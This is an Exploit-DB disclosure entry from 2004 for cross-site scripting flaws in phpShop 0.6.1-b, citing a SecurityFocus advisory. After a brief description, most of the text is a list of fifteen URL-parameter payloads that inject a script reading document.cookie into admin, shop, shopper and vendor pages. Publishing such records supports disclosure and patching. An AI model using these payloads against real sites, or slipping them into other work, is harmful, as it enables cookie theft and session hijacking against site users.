phpShop Web Shopping Cart 0.6.1 -b - Multiple Function XSS

2004-01-16T00:00:00
ID EDB-ID:23546
Type exploitdb
Reporter JeiAr
Modified 2004-01-16T00:00:00

Description

phpShop Web Shopping Cart 0.6.1 -b Multiple Function XSS. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/9437/info

Multiple vulnerabilities have been reported to exist in the software that may allow an attacker to carry out attacks against the database, disclose sensitive information, and execute HTML or script code in a user's browser. The issues include SQL injection, cross-site scripting, HTML injection, and information disclosure.

page=admin/index&GulfTech="><script>alert(document.cookie)</script>
page=shop/browse&category_id="><script>alert(document.cookie)</script>
func="><script>alert(document.cookie)</script>
login="><script>alert(document.cookie)</script>
page=account/shipto&user_info_id="><script>alert(document.cookie)</script>
page=shopper/index&module_description="><script>alert(document.cookie)</script>
page=shopper/menu&menu_label="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_list_mn="><script>alert(document.cookie)</script>
page=shopper/menu&modulename="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_group_list_mnu="><script>alert(document.cookie)</script>
page=shopper/menu&shopper_group_form_mnu="><script>alert(document.cookie)</script>
page=vendor/index&module_description="><script>alert(document.cookie)</script>
page=vendor/index&menu_label="><script>alert(document.cookie)</script>
page=vendor/index&sess="><script>alert(document.cookie)</script>
page=vendor/index&leftbar_title_bgcolor="><script>alert(document.cookie)</script>